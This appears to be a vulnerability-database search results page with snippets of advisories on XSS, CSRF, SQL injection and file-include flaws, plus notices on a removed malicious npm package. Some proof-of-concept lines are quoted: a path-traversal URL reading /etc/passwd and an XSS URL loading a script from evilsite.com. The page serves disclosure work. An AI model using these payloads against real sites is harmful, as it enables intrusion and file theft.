14 matches found
Malicious Package
Overview @vtim/xss-poc is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...
Malicious code in @vtim/xss-poc (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 947e0af0661087703ab13fc4220ceff05dafffb94addd8243f90a86929beaf3c The package @vtim/xss-poc was found to contain malicious code. Source: ghsa-malware 20e54e730a6708f44f0828a03bf7ac5c9fb2c88074659d45570d90af289eca84...
MAL-2026-1440 Malicious code in @vtim/xss-poc (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 947e0af0661087703ab13fc4220ceff05dafffb94addd8243f90a86929beaf3c The package @vtim/xss-poc was found to contain malicious code. Source: ghsa-malware 20e54e730a6708f44f0828a03bf7ac5c9fb2c88074659d45570d90af289eca84...
Logo Slider < 4.0.0 - Contributor+ Stored XSS
Description The plugin does not validate and escape some of its Slider Settings before outputting them back in attributes, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks 1. Using a contributor account, add a Logo Slider using the Shortco...
Floating Chat Widget < 3.1.9 - Editor+ Stored XSS
Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Go to "Chaty New Widget" 2. Create ...
Radancy: Admin account/panel takeOver and Doing actions in admin panel via DOM-based XSS
Hello team , I found Dom-XSS in your https://████████/ Webmail Admin Panel that manage attacker to stealing admin sensitive info and doing any action in your webmail admin panel . why and how this vulnerability happen : - if your reviewed the source code of this endpoint of the admin panel "...
Automattic: [intensedebate.com] XSS Reflected POST-Based on update/tumblr2/{$id}
Summary: Hello, I have found an XSS Reflected POST-Based on https://www.intensedebate.com/update/tumblr2/$id. The parameter $POST'txtCode' is reflected and is not sanitized. To trigger the XSS an attacker need to create a site and invite the victim in their own site and give then full permissions...
NodCMS Cross Site Request Forgery
Exploit Title : nodcms Cross Site Request Forgery Author : Ashiyane Digital Security Team Google Dork : - Date : 29/10/2016 Type : webapps Platform : PHP Vendor Homepage : http://www.nodcms.com/en Software link : https://github.com/khodakhah/nodcms/archive/master.zip CSRF PoC create User:...
Horde 5.1.2 Cross Site Request Forgery / Cross Site Scripting
Exploit Title : CSRF Horde Groupware Web mail Edition Author:Marcela Benetrix Date: 10/28/13 version: 5.1.2 software link:http://www.horde.org/apps/webmail GroupWare Web mail Edition Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, se...
Hivemail Webmail 1.41F Build 103 Cross Site Scripting
!/usr/bin/python ''' Exploit Title: Hivemail Webmail Multiple Stored XSS issues Date: 16/08/2012 Exploit Author: Shai rod @NightRang3r Vendor Homepage: http://www.hivemail.com/ Software Link: http://www.hivemail.com/data/HM141F103.rar Version: 1.41F Build 103 Gr33Tz: @aviadgolan , @benhayak,...
WSN Classifieds 6.2.12 / 6.2.18 Cross Site Scripting / SQL Injection
Exploit Title: WSN Classifieds v.6.2.12 & 6.2.18 Multiple Vulnerabilities Script Page : http://www.wsnclassifieds.com Date: 1-12-2011 Author : RandomStorm - http://www.randomstorm.com Avram Marius Gabriel d3v1l Tested on: Windows XP & Vista IE9 - Firefox 8.0 Note: Redirect and Html Injection can ...
WordPress bSuite 4.0.7 Cross Site Scripting
Original advisory: http://www.ihteam.net/advisory/bsuite-wordpress-permanent-xss/ WordPress bSuite Add Admin Download link: http://wordpress.org/extend/plugins/bsuite/ Author contact: 29/06/2011 POC published: 11/07/2011 Plugin is out-of-date, last update on 2009, so this is just a POC that show...
FreeWebshop <=2.2.2 [local file include & xss]
FreeWebshop =2.2.2 severity: hight vendor site: http://www.freewebshop.org/ impact: an anonymous user can access anyfile on the remote server PoC : http://site.com/?page=../../../../../../../../../../etc/passwd00 http://site.com/index.php?page=../../../../../../../../../../etc/passwd00 xss get :...
Ez Ringtone Manager from scriptez.net - XSS
Ez Ringtone Manager Homepage: http://www.scriptsez.net Effected files: player.php search input box. XSS Vulnerabilities: http://example.com/ringtones/player.php?action=preview&id=SCRIPT20SRC=http://evilsite.com/xss.js/SCRIPT&cat=LG20Mobiles The search box doesnt properlly filter user input. Tags...